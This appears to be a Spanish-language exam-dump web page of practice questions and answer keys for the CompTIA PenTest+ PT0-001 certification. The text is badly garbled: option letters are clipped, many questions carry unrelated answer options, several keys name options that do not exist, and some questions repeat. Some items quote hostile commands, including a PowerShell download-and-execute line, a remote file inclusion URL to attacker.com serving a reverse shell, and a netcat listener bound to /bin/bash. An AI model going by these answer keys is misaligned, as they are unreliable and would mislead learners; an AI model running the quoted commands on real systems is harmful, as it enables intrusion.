¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Últimas preguntas del examen CompTIA PenTest+ PT0-001 para una preparación eficaz

¿Se está preparando para el examen CompTIA PenTest+ PT0-001 y necesita materiales de estudio eficaces? No busque más Nuestra completa colección de preguntas y respuestas de examen, preguntas de examen meticulosamente elaboradas y valiosos recursos de examen le ayudarán a prepararse con confianza. Diseñados para simular la experiencia del examen real, nuestros simulacros de examen son una parte esencial de su estrategia de preparación. Le permitirán evaluar sus conocimientos, identificar áreas de mejora y desarrollar las habilidades necesarias para aprobar con éxito. Con nuestros materiales de estudio y exámenes de práctica elaborados por expertos, obtendrá una comprensión profunda de los conceptos, herramientas y técnicas de las pruebas de penetración. Tanto si es un profesional experimentado como si acaba de comenzar su andadura en el campo de la ciberseguridad, nuestros recursos están diseñados para satisfacer sus necesidades y garantizar su éxito el día del examen.
Realizar otros exámenes en línea

Cuestionar #1
¿Cuál de las siguientes propiedades del acuerdo de compromiso de pruebas de penetración tendrá el MAYOR impacto en la observación y prueba de sistemas de producción en sus cargas más altas?
A. Creación de un ámbito de los sistemas de producción críticos
B. Establecer un calendario de horarios de acceso a las pruebas
C. Establecer un compromiso de pruebas de caja blanca
D. Hacer que la dirección autorice las pruebas intrusivas
Ver respuesta
Respuesta correcta: B
Cuestionar #2
¿En cuál de los siguientes escenarios realizaría un probador un ataque Kerberoasting?
A. El probador ha comprometido un dispositivo Windows y vuelca los secretos LSA
B. El probador necesita recuperar la base de datos SAM y descifrar los hashes de las contraseñas
C. El probador ha comprometido a un usuario con privilegios limitados y necesita apuntar a otras cuentas para el movimiento lateral
D. El probador ha comprometido una cuenta y necesita volcar hashes y contraseñas en texto plano del sistemA
Ver respuesta
Respuesta correcta: C
Cuestionar #3
Un probador de penetración se está preparando para realizar pruebas de API. Cuál de las siguientes opciones sería la MÁS útil para prepararse para esta tarea?
A. ikto
B. UERRA
C. 3AF
D. wagger
Ver respuesta
Respuesta correcta: D
Cuestionar #4
Después de varios intentos, un atacante pudo obtener acceso no autorizado a través de un sensor biométrico utilizando la huella dactilar real del atacante sin explotación. ¿Cuál de las siguientes es la explicación MÁS probable de lo sucedido?
A.
B. l dispositivo biométrico está configurado más hacia los verdaderos negativos
C. l dispositivo biométrico está configurado en fallo cerrado
D. El dispositivo biométrico duplicó la huella dactilar de un usuario válido
Ver respuesta
Respuesta correcta: A
Cuestionar #5
Un análisis de vulnerabilidades identifica que un certificado SSL no coincide con el nombre de host; sin embargo, el cliente cuestiona el hallazgo. Cuál de las siguientes técnicas puede realizar el evaluador de penetración para adjudicar la validez de los hallazgos?
A. Asegúrese de que el escáner puede realizar peticiones DNS salientes
B. segúrese de que el escáner está configurado para realizar la resolución ARP
C. segúrese de que el escáner está configurado para analizar hosts IP
D. Asegúrese de que el escáner tiene cargados los plug-ins adecuados
Ver respuesta
Respuesta correcta: A
Cuestionar #6
¿En cuál de los siguientes escenarios realizaría un probador un ataque Kerberoasting?
A. l probador ha comprometido un dispositivo Windows y vuelca los secretos LSA
B. El probador necesita recuperar la base de datos SAM y descifrar los hashes de las contraseñas
C. El probador ha comprometido a un usuario con privilegios limitados y necesita apuntar a otras cuentas para el movimiento lateral
D. El probador ha comprometido una cuenta y necesita volcar hashes y contraseñas en texto plano del sistemA
Ver respuesta
Respuesta correcta: C
Cuestionar #7
A un probador de penetración se le ha pedido que lleve a cabo la digitación del sistema operativo con Nmap utilizando un archivo de texto proporcionado por la empresa que contiene una lista de direcciones IP. ¿Cuáles de los siguientes son necesarios para llevar a cabo esta exploración? (Elija dos.).
A. Recorrido de directorios
B. Secuencias de comandos en sitios cruzados
C. nclusión remota de archivos
D. Enumeración de usuarios
Ver respuesta
Respuesta correcta: BE
Cuestionar #8
Un consultor de seguridad está intentando atacar un dispositivo con una cuenta de usuario previamente identificada.¿Cuál de los siguientes tipos de ataque se está ejecutando?
A. rpspoof -c ambos -r -t 192
B. rpspoof -t 192
C. rpspoof -c ambos -t 192
D. rpspoof -r -t 192
Ver respuesta
Respuesta correcta: D
Cuestionar #9
Dado el siguiente guión: ¿Cuál de las siguientes opciones describe MEJOR el propósito de este guión?
A. ecogida de registros
B. ecogida de eventos
C. upervisión de pulsaciones de teclas
D. ecogida de mensajes de depuración
Ver respuesta
Respuesta correcta: C
Cuestionar #10
Una empresa realizó una prueba de penetración anual de su entorno. Además de varios hallazgos nuevos, todos los hallazgos identificados previamente persistieron en el último informe. ¿Cuál de las siguientes es la razón MÁS probable?
A. a infraestructura está siendo sustituida por hardware y software similares
B. os administradores de sistemas están aplicando parches erróneos
C. La organización no está tomando medidas para remediar los hallazgos identificados
D. Las herramientas de pruebas de penetración estaban mal configuradas
Ver respuesta
Respuesta correcta: C
Cuestionar #11
Un probador de penetración ha comprometido un host. ¿Cuál de las siguientes opciones sería la sintaxis correcta para crear una escucha Netcat en el dispositivo?
A. c -lvp 4444 /bin/bash
B. c -vp 4444 /bin/bash
C. c -p 4444 /bin/bash
D. c -lp 4444 -e /bin/bash
Ver respuesta
Respuesta correcta: A
Cuestionar #12
Al intentar mantener la persistencia en un sistema Windows con privilegios limitados, ¿cuál de las siguientes claves de registro debe utilizar el probador?
A. HKEY_CLASSES_ROOT
B. HKEY_LOCAL_MACHINE
C. HKEY_ACTUAL_USER
D. HKEY_CURRENT_CONFIG
Ver respuesta
Respuesta correcta: C
Cuestionar #13
Un probador de penetración observa que varios puertos con números altos están escuchando en un servidor web público. Sin embargo, el propietario del sistema dice que la aplicación sólo utiliza el puerto 443. ¿Cuál de las siguientes sería la MEJOR recomendación?
A. ransición de la aplicación a otro puerto
B. iltrar el puerto 443 a direcciones IP específicas
C. mplementar un cortafuegos de aplicaciones web
D. Desactivar los servicios innecesarios
Ver respuesta
Respuesta correcta: D
Cuestionar #14
Un evaluador comienza una prueba de seguridad interna del dominio Windows internal.comptia.net. El evaluador recibe acceso a la red a través de DHCP, pero no recibe ningún mapa de red ni direcciones IP de destino. ¿Cuál de los siguientes comandos puede utilizar el evaluador para encontrar cualquier controlador de dominio de Windows?
A. tilizar la modificación de la ruta para escapar del marco de la aplicación
B. rear un marco que se superponga a la aplicación
C. nyectar un iframe malicioso que contenga JavaScript
D. Pasar un atributo iframe que sea malicioso
Ver respuesta
Respuesta correcta: A
Cuestionar #15
Durante una prueba de penetración en una red interna, un evaluador recupera el hash de la contraseña NTLM de un usuario que se sabe que tiene privilegios completos de administrador en varios sistemas objetivo. Los esfuerzos para descifrar el hash y recuperar la contraseña en texto plano no han tenido éxito. ¿Cuál de los siguientes sería el MEJOR objetivo para continuar con los esfuerzos de explotación?
A. istema operativo: Windows 7Puertos abiertos: 23, 161
B. istema operativo: Windows Server 2016Puertos abiertos: 53, 5900
C. istema operativo: Windows 8
D. istema operativo: Windows 8Puertos abiertos: 514, 3389
Ver respuesta
Respuesta correcta: C
Cuestionar #16
Un probador de penetración ha ejecutado múltiples escaneos de vulnerabilidad contra un sistema objetivo. ¿Cuál de las siguientes opciones sería exclusiva de un análisis con credenciales?
A. xploits para las vulnerabilidades encontradas
B. onfiguraciones detalladas del servicio
C. oftware de terceros sin parchear
D. Configuraciones de control de acceso deficientes
Ver respuesta
Respuesta correcta: A
Cuestionar #17
Una empresa ha contratado a un probador de penetración para realizar una evaluación de una aplicación que reside en la DMZ de la empresa. Antes de llevar a cabo la prueba, ¿en cuál de las siguientes soluciones se debe incluir la dirección IP del evaluador de intrusiones en la lista blanca?
A. AF
B. IDS
C. IDS
D. LP
Ver respuesta
Respuesta correcta: C
Cuestionar #18
Un consultor quiere escanear todos los puertos TCP de un dispositivo identificado. Cuál de los siguientes conmutadores Nmap completará esta tarea?
A. p-
B. p ALL
C. p 1-65534
D. puerto 1-65534
Ver respuesta
Respuesta correcta: A
Cuestionar #19
SIMULACIÓNUsted es un probador de penetración ejecutando escaneos de puertos en un servidor. INSTRUCCIONESParte1: Dada la salida, construye el comando que se utilizó para generar esta salida a partir de las opciones disponibles.Parte2: Una vez que el comando esté construido apropiadamente, use la salida dada para identificar los vectores de ataque potenciales que deberían ser investigados más a fondo.Si en cualquier momento desea regresar al estado inicial de la simulación, por favor haga clic en el botón Reiniciar Todo.Parte1 Parte2
A. Consulte la respuesta en la sección Explicación
Ver respuesta
Respuesta correcta: A
Cuestionar #20
Un probador de penetración está realizando una revisión de código. ¿Cuál de las siguientes técnicas de prueba se está llevando a cabo?
A. Análisis dinámico
B. nálisis Fuzzing
C. nálisis estático
D. Análisis en tiempo de ejecución
Ver respuesta
Respuesta correcta: C
Cuestionar #21
Después de obtener acceso inicial de bajo privilegio a un sistema Linux, un probador de penetración identifica un binario interesante en la carpeta de inicio de un usuario titulado ''changepass."-sr-xr-x 1 root root 6443 Oct 18 2017 /home/user/changepassUsando "strings" para imprimir caracteres ASCII imprimibles desde changepass, el probador observa lo siguiente:$ strings changepassexitsetuidstrcmpGLIBC_2.0ENV_PATH%s/changepwmallocstrlenDada esta información, ¿cuál de las siguientes es la ruta de explotación MÁS probable para alcanzar privilegios de root en
A. opia changepass a un directorio con permisos de escritura y exporta la variable de entorno ENV_PATH a la ruta de un binario de robo de tokens llamado changepw
B. rea una copia de changepass en el mismo directorio, llamándola changepw
C. Exporte la variable de entorno ENV_PATH a la ruta de un directorio con permisos de escritura que contenga un binario de robo de tokens llamado changepw
D. jecute changepass dentro del directorio actual con sudo después de exportar la variable de entorno ENV_PATH a la ruta de '/usr/local/bin'
Ver respuesta
Respuesta correcta: D
Cuestionar #22
Una organización sanitaria debe cumplir la normativa local para proteger y certificar la protección de la información sanitaria personal de las personas cubiertas. ¿Cuál de las siguientes condiciones debe comprobar específicamente un probador de penetración al realizar una evaluación? (Seleccione DOS).
A. Atacar a un ejecutivo con un SMS
B. Atacar por correo electrónico a un equipo específico
C. puntando a usuarios aleatorios con una caída de llave USB
D. Atacar a una organización con un ataque "watering hole"
Ver respuesta
Respuesta correcta: DE
Cuestionar #23
¿Cuál de las siguientes vulnerabilidades tiene MAYOR probabilidad de ser un falso positivo cuando es reportada por un escáner automatizado en una página web HTML estática? (Elija dos.)
A. onfiguración insegura de servicios y protocolos
B. jecutar los servicios SMB y SMTP
C. scasa complejidad de la contraseña y de la cuenta de usuario
D. Mala configuración
Ver respuesta
Respuesta correcta: FG
Cuestionar #24
Considere el siguiente comando PowerShell:powershell.exe IEX (New-Object Net.Webclient).downloadstring(http://site/script.ps1");Invoke-Cmdlet¿Cuál de las siguientes MEJOR describe las acciones realizadas por este comando?
A. stablecer la política de ejecución
B. jecutar un script remoto
C. jecutar un comando codificado
D. Instanciar un objeto
Ver respuesta
Respuesta correcta: B
Cuestionar #25
Después de una reciente prueba de penetración, una empresa tiene un hallazgo con respecto al uso de diccionarios y contraseñas estacionales por parte de sus empleados. Cuál de los siguientes es el MEJOR control para remediar el uso de diccionarios comunes?
A. mplía la longitud de la contraseña de 7 a 14 caracteres
B. Implantar restricciones en el historial de contraseñas
C. onfigurar filtros de contraseña/
D. Desactivar las cuentas después de cinco intentos incorrectos
E. isminuir la ventana de caducidad de la contraseñA
Ver respuesta
Respuesta correcta: A
Cuestionar #26
Un atacante utiliza SET para hacer una copia del portal de correo web alojado en la nube de una empresa y envía un correo electrónico con la esperanza de que el Director General (CEO) inicie sesión para obtener las credenciales de inicio de sesión del CEO. ¿De cuál de los siguientes tipos de ataque es un ejemplo?
A. Ataque de elicitación
B. Ataque de suplantación
C. Ataque Spear phishing
D. Ataque drive-by download
Ver respuesta
Respuesta correcta: A
Cuestionar #27
Mientras supervisa los registros de WAF, un analista de seguridad descubre un ataque con éxito contra la siguiente URL: https://example.com/index.php?Phone=http://attacker.com/badstuffhappens/revshell.phpWhich ¿de las siguientes medidas correctoras deberían tomarse para prevenir este tipo de ataque?
A. mplementar una lista negrA
B. loquear las redirecciones de URL
C. odificar los parámetros con doble URL
D. etener las llamadas externas desde la aplicación
Ver respuesta
Respuesta correcta: B
Cuestionar #28
Un equipo de desarrollo de software ha migrado recientemente a un nuevo software de aplicación en el entorno local. Los resultados de las pruebas de penetración muestran que existen múltiples vulnerabilidades. Si un probador de penetración no tiene acceso a un entorno en vivo o de prueba, una prueba podría ser mejor crear el mismo entorno en la VM. ¿Cuál de las siguientes opciones es la MÁS importante para la confirmación?
A. ashcat -m 5600 -r reglas/bestG4
B. ashcat -m 5600 hash
C. ashcat -m 5600 -a 3 hash
D. ashcat -m 5600 -o resultados
Ver respuesta
Respuesta correcta: A
Cuestionar #29
Un probador de penetración debe realizar OSINT en el personal de una empresa objetivo después de completar el aspecto de infraestructura. ¿Cuál de los siguientes sería el MEJOR paso para la penetración?
A. btener información del personal llamando a la empresa y utilizando técnicas de ingeniería social
B. isitar al cliente y utilizar la suplantación de identidad para obtener información del personal
C. Enviar correos electrónicos falsos al personal para ver si responden con información confidencial
D. Buscar en Internet información sobre el personal, por ejemplo en las redes sociales
Ver respuesta
Respuesta correcta: D
Cuestionar #30
Un evaluador de penetración está realizando una recopilación de inteligencia inicial en algunos hosts remotos antes de realizar una exploración de vulnerabilidades. El evaluador ejecuta el siguiente comando:nmap -D 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130¿Cuál de las siguientes opciones MEJOR describe por qué se especifican múltiples direcciones IP?
A. La red está subredizada como a/25 o superior, y el probador necesitaba acceder a hosts en dos subredes diferentes
B. El probador está intentando realizar un escaneo más sigiloso incluyendo varias direcciones falsas
C. a máquina de escaneado tiene varias interfaces para equilibrar la solicitud de escaneado a través de la tasa especificadA
D. Se ejecuta un escaneo de descubrimiento en el primer conjunto de direcciones, mientras que se ejecuta un escaneo más profundo y agresivo contra el último host
Ver respuesta
Respuesta correcta: B
Cuestionar #31
Un probador de penetración está intentando capturar un apretón de manos entre un cliente y un punto de acceso monitorizando una red inalámbrica segura WPA2-PSK. El probador está monitoreando el canal correcto para la red identificada, pero no ha tenido éxito en la captura de un apretón de manos. Dado el escenario, ¿cuál de los siguientes ataques ayudaría MEJOR al probador a obtener este apretón de manos?
A. Ataque del karma
B. Ataque de desautenticación
C. taque de fragmentación
D. nundación de emisión SSDI
Ver respuesta
Respuesta correcta: B
Cuestionar #32
Un evaluador de penetración informa que una aplicación sólo utiliza autenticación básica en una aplicación orientada a Internet. ¿Cuál de las siguientes sería la MEJOR estrategia de corrección?
A. Activar la seguridad estricta de transporte HTTP
B. abilitar una bandera de cookie segurA
C. ifrar el canal de comunicación
D. Sanear las entradas no válidas del usuario
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Un evaluador de penetración ha explotado con éxito una vulnerabilidad en el servidor de autenticación de una organización y ahora quiere configurar un shell inverso. El probador de penetración encuentra que Netcat no está disponible en el objetivo.¿Cuál de los siguientes enfoques es una opción adecuada para intentar NEXT?
A. jecute xterm para conectarse al servidor X del objetivo
B. ntentar escalar privilegios para adquirir un shell interactivo
C. ntenta usar el socket /dev/tcp
D. ntenta leer out/etc/shadow
Ver respuesta
Respuesta correcta: C
Cuestionar #34
Un técnico junior de la plantilla realizó una prueba de penetración. Durante la prueba, el técnico descubrió que la aplicación web podía revelar una tabla SQL con información de cuentas de usuario y contraseñas. ¿Cuál de las siguientes es la forma MÁS eficaz de notificar a la dirección este hallazgo y su importancia?
A. ocumentar los resultados con un resumen ejecutivo, recomendaciones y capturas de pantalla de la divulgación de la aplicación web
B. Conéctese al servidor SQL utilizando esta información y cambie la contraseña de una o dos cuentas no críticas para demostrar una prueba de concepto a la dirección
C. otificar el descubrimiento al equipo de desarrollo y sugerir que se implemente la validación de entradas con una empresa profesional de pruebas de penetración
D. olicitar que la dirección cree una RFP para iniciar un compromiso formal con una empresa profesional de pruebas de penetración
Ver respuesta
Respuesta correcta: A
Cuestionar #35
El gestor de DRAG DROPA pide ayuda a un evaluador para diagnosticar un problema en el siguiente script de Python:#!/usr/bin/pythons = "Administrator "El evaluador sospecha que se trata de un problema con el corte y la manipulación de cadenas. Analice el siguiente segmento de código y arrastre y suelte la salida correcta para cada manipulación de cadena a su segmento de código correspondiente. Las opciones pueden utilizarse una vez o ninguna.Seleccionar y colocar:
A. Consulte la respuesta en la sección Explicación
Ver respuesta
Respuesta correcta: A
Cuestionar #36
Se proporcionó a un analista de seguridad un informe de penetración detallado, que se realizó contra el entorno DMZ de la organización. Se observó en el informe que un hallazgo tiene una puntuación base CVSS de 10,0. ¿Cuál de los siguientes niveles de dificultad se requeriría para explotar esta vulnerabilidad? ¿Cuál de los siguientes niveles de dificultad sería necesario para explotar esta vulnerabilidad?
A.
B. lgo difícil; se necesitaría una gran capacidad de procesamiento para explotarlA
C. rivial; se requiere poco esfuerzo para explotar este hallazgo
D. Imposible; los hosts externos están reforzados para protegerlos contra ataques
Ver respuesta
Respuesta correcta: C
Cuestionar #37
La estrategia de pruebas de penetración de caja negra proporciona al probador:
A. na lista de objetivos
B. n diagrama de red
C. ódigo fuente
D. credenciales privilegiadas
Ver respuesta
Respuesta correcta: D
Cuestionar #38
Un infiltrado fue capaz de recuperar las credenciales iniciales del dominio de usuario de la VPN suplantando la identidad de un miembro del departamento de TI. Después, el probador de penetración obtuvo hashes a través de la VPN y los descifró fácilmente utilizando un ataque de diccionario. ¿Cuál de los siguientes pasos debería recomendarse? (Seleccione TRES).
A. Proveedor de hardware
B. nterferencias de canal
C. Nombres de usuario
D. Fortaleza clave
Ver respuesta
Respuesta correcta: BCG
Cuestionar #39
¿Cuál de los siguientes extractos procedería de una política de empresa?
A. Las contraseñas de los empleados deben contener un mínimo de ocho caracteres, siendo uno de ellos alfanumérico
B. Puede llamar al servicio de asistencia al 800-passwd1 para restablecer las contraseñas
C. Los empleados deben utilizar contraseñas seguras para acceder a los activos de la empresA
D. Los sistemas corporativos deben almacenar contraseñas usando el algoritmo hashing MD5
Ver respuesta
Respuesta correcta: D
Cuestionar #40
Un probador de penetración ha obtenido acceso al dispositivo de un empleado de marketing. El probador de penetración quiere asegurarse de que si se descubre el acceso, se puede recuperar el control del dispositivo. ¿Cuál de las siguientes acciones debe utilizar el probador de penetración para mantener la persistencia al dispositivo? (Seleccione DOS.)
A. ydra
B. ohn el Destripador
C. ashcat
D. Melocotón
Ver respuesta
Respuesta correcta: AC
Cuestionar #41
¿Cuáles de los siguientes puntos son los MÁS importantes a la hora de planificar un compromiso? (Seleccione DOS).
A. ealiza un escaneo de puertos
B. oge el banner del servidor web
C. edirige un TTY a un sistema remoto
D. limina los registros de errores para la IP suministradA
Ver respuesta
Respuesta correcta: AC
Cuestionar #42
Un probador de penetración está realizando un escaneo remoto para determinar si la granja de servidores cumple con la línea base de software de la compañía. Cuál de las siguientes acciones debe realizar el evaluador de intrusiones para verificar el cumplimiento de la línea de base?
A. scaneo de descubrimiento
B. scaneo sigiloso
C. xploración completa
D. scaneo acreditado
Ver respuesta
Respuesta correcta: A
Cuestionar #43
Un probador de penetración entrega un informe de escaneo de vulnerabilidad de una aplicación web a un cliente. El evaluador de intrusión califica una vulnerabilidad como de gravedad media. La misma vulnerabilidad se calificó como crítica en el informe anterior. ¿Cuál de las siguientes es la razón MÁS probable para la reducción de la gravedad?
A. l cliente ha aplicado un hot fix sin actualizar la versión
B. El panorama de las amenazas ha cambiado significativamente
C. El cliente ha actualizado su código base con nuevas funciones
D. hera actualmente no hay exploits conocidos para esta vulnerabilidad
Ver respuesta
Respuesta correcta: A
Cuestionar #44
A Joe, un especialista en pruebas de penetración, se le pide que evalúe la seguridad física de una empresa accediendo a sus oficinas corporativas. Joe está buscando un método que le permita entrar en el edificio durante las horas de oficina o cuando no haya empleados en el lugar. ¿Cuál de los siguientes métodos sería el MÁS eficaz para conseguirlo?
A. lonación de insignias
B. orzamiento de cerraduras
C. ailgating
D. A cuestas
Ver respuesta
Respuesta correcta: A
Cuestionar #45
Un probador de penetración ha realizado un pivoteo a un nuevo dispositivo Linux en una red diferente. El probador escribe el siguiente comando:for m in {1..254..1};do ping -c 1 192.168.101.$m; done¿Cuál de las siguientes opciones MEJOR describe el resultado de ejecutar este comando?
A. xploración de puertos
B. numeración de servicios
C. dentificación de huéspedes vivos
D. Denegación de servicio
Ver respuesta
Respuesta correcta: C
Cuestionar #46
Un consultor realiza un ataque de ingeniería social contra un cliente. El consultor ha podido recopilar una serie de nombres de usuario y contraseñas mediante una campaña de phishing. El consultor recibe credenciales para acceder a las cuentas de correo electrónico de varios empleados. A la vista de los resultados, ¿cuál de las siguientes medidas debería recomendar el consultor?
A. olítica de contraseñas seguras
B. ifrado de contraseña
C. Refuerzo del sistema de correo electrónico
D. Autenticación de dos factores
Ver respuesta
Respuesta correcta: D
Cuestionar #47
¿Cuál de las siguientes opciones tiene un impacto directo y significativo en el presupuesto de la evaluación de la seguridad?
A. Alcance
B. Programación
C. equisitos de conformidad
D. iesgo objetivo
Ver respuesta
Respuesta correcta: D
Cuestionar #48
Un especialista en pruebas de penetración ha realizado una evaluación de seguridad para una empresa emergente. El informe enumera un total de diez vulnerabilidades, cinco de ellas identificadas como críticas. El cliente no tiene los recursos para remediar inmediatamente todas las vulnerabilidades. En estas circunstancias, ¿cuál de las siguientes sería la MEJOR sugerencia para el cliente?
A. ara eliminar la persistencia
B. Para activar la persistencia
C. nformar de la persistencia
D. Para comprobar la persistencia
Ver respuesta
Respuesta correcta: D
Cuestionar #49
Un probador de penetración entrega un informe de escaneo de vulnerabilidad de una aplicación web a un cliente. El evaluador de intrusión califica una vulnerabilidad como de gravedad media. La misma vulnerabilidad se calificó como crítica en el informe anterior. ¿Cuál de las siguientes es la razón MÁS probable para la reducción de la gravedad?
A. El cliente ha aplicado un hot fix sin actualizar la versión
B. El panorama de las amenazas ha cambiado significativamente
C. El cliente ha actualizado su código base con nuevas funciones
D. Thera actualmente no hay exploits conocidos para esta vulnerabilidad
Ver respuesta
Respuesta correcta: A
Cuestionar #50
Se ha asignado a un evaluador de penetración la realización de una evaluación de penetración externa de una empresa. ¿Cuál de los siguientes pasos sería el MEJOR para el proceso de recopilación de información pasiva? (Elija dos.)
A. uiones para niños
B. PT actores
C. Amenazas internas
D. Grupos hacktivistas
Ver respuesta
Respuesta correcta: DE
Cuestionar #51
Un probador de penetración fue capaz de introducir un comando de inyección SQL en un cuadro de texto y obtener acceso a la información almacenada en la base de datos. ¿Cuál de las siguientes es la MEJOR recomendación para mitigar la vulnerabilidad?
A. leatorizar las credenciales utilizadas para iniciar sesión
B. nstalar la detección de intrusos basada en host
C. plicar la normalización de la entradA
D. ealizar el endurecimiento del sistemA
Ver respuesta
Respuesta correcta: D
Cuestionar #52
¿Cuál de los siguientes extractos procedería de una política de empresa?
A. as contraseñas de los empleados deben contener un mínimo de ocho caracteres, siendo uno de ellos alfanumérico
B. Puede llamar al servicio de asistencia al 800-passwd1 para restablecer las contraseñas
C. Los empleados deben utilizar contraseñas seguras para acceder a los activos de la empresA
D. os sistemas corporativos deben almacenar las contraseñas utilizando el algoritmo hash MD5
Ver respuesta
Respuesta correcta: D
Cuestionar #53
Un probador de penetración está probando una aplicación bancaria y descubre una vulnerabilidad. El probador está conectado como un usuario sin privilegios que no debería tener acceso a ningún dato. Dados los siguientes datos del proxy de interceptación web: ¿Cuál de los siguientes tipos de vulnerabilidades se está explotando?
A. ulnerabilidad de navegación forzada
B. arámetros de vulnerabilidad a la contaminación
C. Vulnerabilidad en la carga de archivos
D. numeración de cookies
Ver respuesta
Respuesta correcta: D
Cuestionar #54
Un usuario malicioso quiere realizar un ataque MITM a un ordenador. La configuración de red del ordenador es la siguiente:IP: 192.168.1.20NETMASK: 255.255.255.0DEFAULT GATEWAY: 192.168.1.254DHCP: 192.168.1.253DNS: 192.168.10.10, 192.168.20.10¿Cuál de los siguientes comandos debería ejecutar el usuario malicioso para realizar el ataque MITM?
A. as listas blancas evitan un posible ataque DoS inadvertido contra el IPS y los sistemas de monitorización de registros de apoyo
B. Las pruebas de penetración de sistemas IPS de terceros suelen requerir documentación y autorizaciones adicionales, lo que puede retrasar la realización de pruebas urgentes
C. as reglas de listas blancas de IPS requieren actualizaciones frecuentes para mantenerse al día, en constante desarrollo de vulnerabilidades y debilidades recién descubiertas
D. Las pruebas deben centrarse en el descubrimiento de posibles problemas de seguridad en todos los sistemas incluidos, no en determinar la eficacia relativa de las defensas activas, como un IPS
Ver respuesta
Respuesta correcta: B
Cuestionar #55
Un probador de penetración tiene un shell completo a un controlador de dominio y quiere descubrir cualquier cuenta de usuario que no se ha autenticado en el dominio en 21 días. ¿Cuál de los siguientes comandos es el MEJOR para lograrlo?
A. srm -users "DN=empresA
B. suser -nombre -cuenta -limite 3
C. squery usuario -inactivo 3
D. squery -o -rdn -limit 21
Ver respuesta
Respuesta correcta: D
Cuestionar #56
¿De cuál de los siguientes tipos de técnicas de intrusión es un ejemplo el uso de una "herramienta bajo la puerta" durante una evaluación de seguridad física?
A. esactivar el puerto de red del servicio afectado
B. ompletar todas las conclusiones y, a continuación, presentarlas al cliente
C. Avisar inmediatamente al cliente con los detalles del hallazgo
D. Desconectar el objetivo para que no pueda ser explotado por un atacante
Ver respuesta
Respuesta correcta: D
Cuestionar #57
Un cliente solicita a un evaluador de penetración que añada más direcciones a una prueba actualmente en curso. ¿Cuál de las siguientes opciones definiría la lista de objetivos?
A. Normas de intervención
B. Contrato de servicios de maternidad
C. eclaración de trabajo
D. Acuerdo de licencia de usuario final
Ver respuesta
Respuesta correcta: C
Cuestionar #58
Una persona que realiza pruebas de penetración explota con éxito un servidor DMZ que parece estar escuchando en un puerto de salida. El probador de penetración desea reenviar ese tráfico de vuelta a un dispositivo. ¿Cuál de las siguientes es la MEJOR herramienta para este propósito? (Elija dos.)
A. ig -q any _kerberos
B. ig -q any _lanman
C. ig -q any _ntlm
D. ig -q any _smtp
Ver respuesta
Respuesta correcta: BD
Cuestionar #59
A un probador de penetración se le ha pedido que lleve a cabo la digitación del sistema operativo con Nmap utilizando un archivo de texto proporcionado por la empresa que contiene una lista de direcciones IP. ¿Cuáles de los siguientes son necesarios para llevar a cabo esta exploración? (Elija dos.)
A. Ejecutar un exploit de día cero
B. rear un nuevo usuario de dominio con una contraseña conocidA
C. odificar un servicio conocido en tiempo de arranque para instanciar una devolución de llamadA
D. Obtener credenciales en texto claro del usuario comprometido
Ver respuesta
Respuesta correcta: AB
Cuestionar #60
Un evaluador de penetración identifica los siguientes hallazgos durante una exploración de vulnerabilidad externa: ¿Cuál de las siguientes estrategias de ataque debe priorizarse a partir de los resultados de la exploración anterior?
A. Apéndices
B. esumen ejecutivo
C. esumen técnico
D. Cuerpo principal
Ver respuesta
Respuesta correcta: D
Cuestionar #61
Los dispositivos IoT de consumo suelen ser menos seguros que los sistemas creados para ordenadores de sobremesa tradicionales. Cuál de las siguientes opciones describe MEJOR el razonamiento?
A. sfconsole
B. spacio de trabajo
C. sfvenom
D. b_init
E. b_connect
Ver respuesta
Respuesta correcta: A
Cuestionar #62
DRAG DROPColoque cada una de las siguientes contraseñas por orden de complejidad, desde la menos compleja (1) a la más compleja (4), en función de los conjuntos de caracteres representados. Cada contraseña sólo puede utilizarse una vez:
A. Consulte la respuesta en la sección Explicación
Ver respuesta
Respuesta correcta: A
Cuestionar #63
Un cliente ha expresado su preocupación por el número de empresas que están siendo vulneradas por atacantes remotos, que buscan secretos comerciales. ¿Cuál de las siguientes opciones describe MEJOR el tipo de adversarios que esto identificaría?
A. jecute la aplicación a través de un analizador de código dinámico
B. mplear una utilidad de fuzzing
C. escompilar la aplicación
D. Comprobar las asignaciones de memoriA
Ver respuesta
Respuesta correcta: B
Cuestionar #64
Una empresa de energía contrató a una empresa de seguridad para realizar una prueba de penetración en una central eléctrica, que emplea ICS para gestionar la generación de energía y la refrigeración. Cuál de las siguientes es una consideración exclusiva de dicho entorno que la empresa debe tener en cuenta al preparar la evaluación?
A. elección del conjunto adecuado de herramientas de pruebas de seguridad
B. ntensidad y capacidad de carga de los componentes del ICS
C. eligros potenciales para el funcionamiento y la seguridad
D. Certificación eléctrica del hardware utilizado en la prueba
Ver respuesta
Respuesta correcta: A
Cuestionar #65
Un cliente ha programado una prueba de penetración inalámbrica. ¿Cuál de las siguientes opciones describe la información que MÁS probablemente se necesite antes de comenzar la prueba?
A. La ubicación física y los ESSID de red que se van a probar
B. El número de dispositivos inalámbricos que posee el cliente
C. El proveedor del punto de acceso inalámbrico preferido por el cliente
D. Las bandas y frecuencias utilizadas por los dispositivos del cliente
Ver respuesta
Respuesta correcta: D
Cuestionar #66
Joe, un probador de penetración, ha recibido credenciales de cuenta básicas y ha iniciado sesión en un sistema Windows. Para escalar su privilegio, ¿desde cuál de los siguientes lugares está utilizando Mimikatz para extraer credenciales?
A. iclo A
B. asar el hash para retransmitir credenciales
C. ontraseña de fuerza bruta para iniciar sesión en el host
D. Secuestro de sesión para suplantar una cuenta del sistema
Ver respuesta
Respuesta correcta: C
Cuestionar #67
Tras realizar una evaluación de seguridad para una empresa, se descubrió que se había facturado al cliente por el tiempo en que el entorno de pruebas del cliente no estuvo disponible. El cliente afirma que se le ha facturado injustamente. ¿Cuál de los siguientes documentos es MÁS probable que pueda servir de orientación en esta situación?
A. asa adicional
B. Política de empresa
C. olerancia al impacto
D. Tipo de industria
Ver respuesta
Respuesta correcta: D

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: